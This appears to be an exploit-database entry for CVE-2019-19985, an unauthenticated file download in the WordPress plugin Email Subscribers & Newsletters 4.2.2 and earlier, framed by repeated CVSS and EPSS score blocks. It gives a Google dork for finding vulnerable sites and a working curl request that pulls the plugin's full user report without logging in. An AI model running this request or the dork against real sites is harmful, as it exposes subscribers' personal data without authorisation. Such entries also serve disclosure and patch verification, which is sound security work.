5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
5.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
5.8 Medium
AI Score
Confidence
High
0.433 Medium
EPSS
Percentile
97.4%
# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
# Date: 2020-07-20
# Exploit Author: KBA@SOGETI_ESEC
# Vendor Homepage: https://www.icegram.com/email-subscribers/
# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
# Version: <= 4.2.2
# Tested on: Email Subscribers & Newsletters 4.2.2
# CVE : CVE-2019-19985
################################################################################################
# ___ ___ ___ ___ ___ #
# /\ \ /\ \ /\ \ /\ \ /\ \ ___ #
# /::\ \ /::\ \ /::\ \ /::\ \ \:\ \ /\ \ #
# /:/\ \ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ \:\ \ \:\ \ #
# _\:\~\ \ \ /:/ \:\ \ /:/ \:\ \ /::\~\:\ \ /::\ \ /::\__\ #
# /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/ #
# \:\ \:\ \/__\:\ \ /:/ \:\ /\ \/__\:\~\:\ \/__/:/ \/__/\/:/ / #
# \:\ \:\__\ \:\ /:/ / \:\ \:\__\ \:\ \:\__\/:/ / \::/__/ #
# \:\/:/ / \:\/:/ / \:\/:/ / \:\ \/__/\/__/ \:\__\ #
# \::/ / \::/ / \::/ / \:\__\ \/__/ #
# \/__/ \/__/ \/__/ \/__/ #
# ___ ___ ___ ___ #
# /\ \ /\ \ /\ \ /\ \ #
# /::\ \ /::\ \ /::\ \ /::\ \ #
# EXPLOIT /:/\:\ \ /:/\ \ \ /:/\:\ \ /:/\:\ \ #
# Email Subscribers & Newsletters <= 4.2.2 /::\~\:\ \ _\:\~\ \ \ /::\~\:\ \ /:/ \:\ \ #
# Unauthenticated File Download /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #
# \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\ \ \/__/ #
# \:\ \:\__\ \:\ \:\__\ \:\ \:\__\ \:\ \ #
# \:\ \/__/ \:\/:/ / \:\ \/__/ \:\ \ #
# \:\__\ \::/ / \:\__\ \:\__\ #
# KBAZ \/__/ \/__/ \/__/ \/__/ #
# #
# #
################################################################################################
curl [BASE_URL]'/wp-admin/admin.php?page=download_report&report=users&status=all'
EXAMPLE: curl 'http://127.0.0.1/wp-admin/admin.php?page=download_report&report=users&status=all'
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
5.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
5.8 Medium
AI Score
Confidence
High
0.433 Medium
EPSS
Percentile
97.4%